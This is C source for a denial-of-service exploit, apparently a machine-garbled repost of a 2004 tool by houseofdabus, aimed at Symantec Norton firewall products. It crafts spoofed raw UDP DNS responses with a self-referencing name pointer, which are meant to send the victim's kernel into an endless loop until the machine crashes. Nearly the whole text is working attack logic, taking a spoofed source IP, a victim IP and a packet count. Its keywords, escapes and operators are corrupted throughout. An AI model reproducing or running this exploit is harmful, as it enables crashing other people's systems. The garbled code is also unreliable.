Ximen Ike firewall d.o.s attack code

Author: houseofdabus
Name: HOD-symantec-firewall-DoS-expl.c:
Version: version 0.1 coded by houseofdabus
Translation: luoluo
Vulnerability discovery: www.eeye.com
Vulnerability Description: http://www.eeye.com/html/Research/Advisories/AD20040512B.html

*-------------------------------------------------------------------
* Program test:
*-Symantec Norton Personal Firewall 2004

* Affected products:
*-Symantec Norton Internet Security 2002
*-Symantec Norton Internet Security 2003
*-Symantec Norton Internet Security 2004
*-Symantec Norton Internet Security Professional 2002
*-Symantec Norton Internet Security Professional 2003
*-Symantec Norton Internet Security Professional 2004
*-Symantec Norton Personal Firewall 2002
*-Symantec Norton Personal Firewall 2003
*-Symantec Norton Personal Firewall 2004
*-Symantec Client Firewall 5.01, 5.1.1
*-Symantec Client Security 1.0, 1.1, 2.0 (SCF 7.1)
*-Symantec Norton AntiSpam 2004

*-------------------------------------------------------------------
* Note:
Eeye digital security has discovered the second security vulnerability in the Symantec Firewall series. This vulnerability can be remotely detected and exploited to launch DoS attacks against affected systems. by sending a single malicious DNS (UDP port 53) response packet to a vulnerable host, attackers can enable Symantec DNS to return confirmation code to an endless loop in the kernel until the system crashes. The attacked host can resume operation only after physical restart.

*-------------------------------------------------------------------
* Compilation:
* Win32/VC ++: CL-O hod-sym-dos-expl HOD-sym-DoS-expl.c ws2_32.lib
* Win32/cygwin: gcc-O hod-sym-dos-expl HOD-sym-DoS-expl.c-lws2_32.lib
* Linux: gcc-O hod-sym-dos-expl HOD-sym-DoS-expl.c-wall

*-------------------------------------------------------------------
* Command line parameters/descriptions:

* Hod-Symantec-firewall-dos-expl [-fi: Str] [-TP: int] [-Ti: Str] [-N: int]

*-Fi: IP from (sender) IP Address
*-TP: int to (recipient) Port Number
*-Ti: IP to (recipient) IP Address
*-N: int number of times to send message
*
*/

# Ifdef _ Win32
# Pragma comment (Lib, "ws2_32 ")
# Pragma pack (1)
# Define win32_lean_and_mean
# Include <winsock2.h>
# Include <ws2tcpip. h>/* ip_hdrincl */
# Include <stdio. h>
# Include <stdlib. h>

# Else
# Include <sys/types. h>
# Include <netinet/in. h>
# Include <sys/socket. h>
# Include <stdio. h>
# Include <stdlib. h>
# Include <ARPA/inet. h>
# Include <netdb. h>
# Include <sys/timeb. h>
# Include <string. h>
# Endif

# Deprecision max_message 4068
# Define max_packet 4096

# Define default_port 53
# Define default_ip "10.0.0.1"
# Define default_count 1

# Ifndef _ Win32
# Define far
# Endif

/* Define the DNS header */
Char dnsreply [] =
"/Xc9/x9c"/* transaction ID */
"/X80/x00"/* flags (bit 15: Response )*/
"/X00/x01"/* Number of questions */
"/X00/x01"/* Number of answer RRS */
"/X00/x00"/* Number of authority RRS */
"/X00/x00"/* Number of additional RRS */
"/Xc0/x0c";/* Compressed Name Pointer to itself */

/* Define the IP header */
Typedef struct ip_hdr {
Unsigned char ip_verlen;/* IP version & length */
Unsigned char ip_tos;/* IP type of service */
Unsigned short ip_totallength;/* total length */
Unsigned short ip_id;/* Unique Identifier */
Unsigned short ip_offset;/* Fragment offset field */
Unsigned char ip_ttl;/* Time to live */
Unsigned char ip_protocol;/* Protocol */
Unsigned short ip_checksum;/* IP checksum */
Unsigned int ip_srcaddr;/* Source Address */
Unsigned int ip_destaddr;/* Destination Address */
} Ip_hdr, * pip_hdr, far * lpip_hdr;

/* Define the UDP header */
Typedef struct udp_hdr {
Unsigned short src_portno;/* Source Port Number */
Unsigned short dst_portno;/* destination port number */
Unsigned short udp_length;/* UDP packet length */
Unsigned short udp_checksum;/* UDP checksum (optional )*/
} Udp_hdr, * pudp_hdr;

/* Globals */
Unsigned long dwtoip, // ip to send
Dwfromip; // ip to send from (spoof)
Unsigned short itoport, // port to send
Ifromport; // port to send from (spoof)
Unsigned long dwcount; // number of times to send
Char strmessage [max_message]; // message to send

Void
Usage (char * progname ){
Printf ("Usage:/n ");
Printf ("% S <-fi: SRC-IP> <-Ti: VICTIM-IP> [-TP: DST-PORT] [-N: int]/n", progname );
Printf ("-fi: IP from (sender) IP Address/N ");
Printf ("-TP: int to (recipient) open UDP port number:/N ");
Printf ("137,138,445,500 (default)/n ");
Printf ("-Ti: IP to (recipient) IP Address/N ");
Printf ("-N: int number of times/N ");
Exit (1 );
}

Void
Validateargs (INT argc, char ** argv)
{
Int I;

Itoport = 500;
Ifromport = default_port;
Dwtoip = inet_addr (default_ip );
Dwfromip = inet_addr (default_ip );
Dwcount = default_count;
Memcpy (strmessage, dnsreply, sizeof (dnsreply)-1 );

For (I = 1; I <argc; I ++ ){
If (argv [I] [0] = '-') | (argv [I] [0] = '/')){
Switch (tolower (argv [I] [1]) {
Case 'F ':
Switch (tolower (argv [I] [2]) {
Case 'I ':
If (strlen (argv [I])> 4)
Dwfromip = inet_addr (& argv [I] [4]);
Break;
Default:
Usage (argv [0]);
Break;
}
Break;
Case 'T ':
Switch (tolower (argv [I] [2]) {
Case 'p ':
If (strlen (argv [I])> 4)
Itoport = atoi (& argv [I] [4]);
Break;
Case 'I ':
If (strlen (argv [I])> 4)
Dwtoip = inet_addr (& argv [I] [4]);
Break;
Default:
Usage (argv [0]);
Break;
}
Break;
Case 'N ':
If (strlen (argv [I])> 3)
Dwcount = atol (& argv [I] [3]);
Break;
Default:
Usage (argv [0]);
Break;
}
}
}
Return;
}

/* This function calculates the 16-bit one's complement sum */
/* For the supplied buffer */
Unsigned short
Checksum (unsigned short * buffer, int size)
{
Unsigned long cksum = 0;

While (size> 1 ){
Cksum + = * buffer ++;
Size-= sizeof (unsigned short );
}
If (size ){
Cksum + = * (unsigned char *) buffer;
}
Cksum = (cksum> 16) + (cksum & 0 xFFFF );
Cksum + = (cksum> 16 );

Return (unsigned short )(~ Cksum );
}

Int
Main (INT argc, char ** argv)
{
# Ifdef _ Win32
Wsadata WSD;
# Endif
Int S;
# Ifdef _ Win32
Bool bopt;
# Else
Int bopt;
# Endif
Struct sockaddr_in remote;
Ip_hdr iphdr;
Udp_hdr udphdr;
Int ret;
Unsigned long I;
Unsigned short itotalsize,
Iudpsize,
Iudpchecksumsize,
Iipversion,
Iipsize,
Cksum = 0;
Char Buf [max_packet],
* PTR = NULL;
# Ifdef _ Win32
In_addr ADDR;
# Else
Struct sockaddr_in ADDR;
# Endif

Printf ("/nsymantec Multiple Firewall DNS Response Denial-of-Service exploit v0.1/N ");
Printf ("bug discoveried by eeye:/N ");
Printf ("http://www.eeye.com/html/Research/Advisories/AD20040512B.html/n/n ");
Printf ("--- coded by.: [houseofdabus]:. ---/n ");

If (argc <3) usage (argv [0]);

/* Parse command line arguments and print them out */
Validateargs (argc, argv );
# Ifdef _ Win32
ADDR. s_un.s_addr = dwfromip;
Printf ("[*] from IP: <% S>, Port: % d/N", inet_ntoa (ADDR), ifromport );
ADDR. s_un.s_addr = dwtoip;
Printf ("[*] to IP: <% S>, Port: % d/N", inet_ntoa (ADDR), itoport );
Printf ("[*] Count: % d/N", dwcount );
# Else
ADDR. sin_addr.s_addr = dwfromip;
Printf ("[*] from IP: <% S>, Port: % d/N", inet_ntoa (ADDR. sin_addr), ifromport );
ADDR. sin_addr.s_addr = dwtoip;
Printf ("[*] to IP: <% S>, Port: % d/N", inet_ntoa (ADDR. sin_addr), itoport );
Printf ("[*] Count: % d/N", dwcount );
# Endif

# Ifdef _ Win32
If (wsastartup (makeword (2, 2), & WSD )! = 0 ){
Printf ("[-] wsastartup () failed: % d/N", getlasterror ());
Return-1;
}
# Endif
/* Creating a raw socket */
S = socket (af_inet, sock_raw, ipproto_udp );
# Ifdef _ Win32
If (S = invalid_socket ){
Printf ("[-] wsasocket () failed: % d/N", wsagetlasterror ());
Return-1;
}
# Endif

/* Enable the IP header include option */
# Ifdef _ Win32
Bopt = true;
# Else
Bopt = 1;
# Endif
Ret = setsockopt (S, ipproto_ip, ip_hdrincl, (char *) & bopt, sizeof (bopt ));
# Ifdef _ Win32
If (ret = socket_error ){
Printf ("[-] setsockopt (ip_hdrincl) failed: % d/N", wsagetlasterror ());
Return-1;
}
# Endif
/* Initalize the IP header */
Itotalsize = sizeof (iphdr) + sizeof (udphdr) + sizeof (dnsreply)-1;

Iipversion = 4;
Iipsize = sizeof (iphdr)/sizeof (unsigned long );

Iphdr. ip_verlen = (iipversion <4) | iipsize;
Iphdr. ip_tos = 0;/* IP type of service */
Iphdr. ip_totallength = htons (itotalsize);/* Total Packet Len */
Iphdr. ip_id = 0;/* unique identifier: set to 0 */
Iphdr. ip_offset = 0;/* Fragment offset field */
Iphdr. ip_ttl = 128;/* Time to live */
Iphdr. ip_protocol = 0x11;/* protocol (UDP )*/
Iphdr. ip_checksum = 0;/* IP checksum */
Iphdr. ip_srcaddr = dwfromip;/* Source Address */
Iphdr. ip_destaddr = dwtoip;/* Destination Address */

/* Initalize the UDP header */
Iudpsize = sizeof (udphdr) + sizeof (dnsreply)-1;

Udphdr. src_portno = htons (ifromport );
Udphdr. dst_portno = htons (itoport );
Udphdr. udp_length = htons (iudpsize );
Udphdr. udp_checksum = 0;

Iudpchecksumsize = 0;
PTR = Buf;
Memset (BUF, 0, max_packet );

Memcpy (PTR, & iphdr. ip_srcaddr, sizeof (iphdr. ip_srcaddr ));
PTR + = sizeof (iphdr. ip_srcaddr );
Iudpchecksumsize + = sizeof (iphdr. ip_srcaddr );

Memcpy (PTR, & iphdr. ip_destaddr, sizeof (iphdr. ip_destaddr ));
PTR + = sizeof (iphdr. ip_destaddr );
Iudpchecksumsize + = sizeof (iphdr. ip_destaddr );

PTR ++;
Iudpchecksumsize + = 1;

Memcpy (PTR, & iphdr. ip_protocol, sizeof (iphdr. ip_protocol ));
PTR + = sizeof (iphdr. ip_protocol );
Iudpchecksumsize + = sizeof (iphdr. ip_protocol );

Memcpy (PTR, & udphdr. udp_length, sizeof (udphdr. udp_length ));
PTR + = sizeof (udphdr. udp_length );
Iudpchecksumsize + = sizeof (udphdr. udp_length );

Memcpy (PTR, & udphdr, sizeof (udphdr ));
PTR + = sizeof (udphdr );
Iudpchecksumsize + = sizeof (udphdr );

For (I = 0; I <sizeof (dnsreply)-1; I ++, PTR ++)
* PTR = strmessage [I];
Iudpchecksumsize + = sizeof (dnsreply)-1;

Cksum = checksum (unsigned short *) BUF, iudpchecksumsize );
Udphdr. udp_checksum = cksum;

Memset (BUF, 0, max_packet );
PTR = Buf;

Memcpy (PTR, & iphdr, sizeof (iphdr); PTR + = sizeof (iphdr );
Memcpy (PTR, & udphdr, sizeof (udphdr); PTR + = sizeof (udphdr );
Memcpy (PTR, strmessage, sizeof (dnsreply)-1 );

Remote. sin_family = af_inet;
Remote. sin_port = htons (itoport );
Remote. sin_addr.s_addr = dwtoip;

For (I = 0; I <dwcount; I ++ ){
# Ifdef _ Win32
Ret = sendto (S, Buf, itotalsize, 0, (sockaddr *) & remote,
Sizeof (remote ));

If (ret = socket_error ){
Printf ("[-] sendto () failed: % d/N", wsagetlasterror ());
Break;
} Else
# Else
Ret = sendto (S, Buf, itotalsize, 0, (struct sockaddr *) & remote,
Sizeof (remote ));
# Endif
Printf ("[+] sent % d Bytes/N", RET );
}

# Ifdef _ Win32
Closesocket (s );
Wsacleanup ();
# Endif

Return 0;
}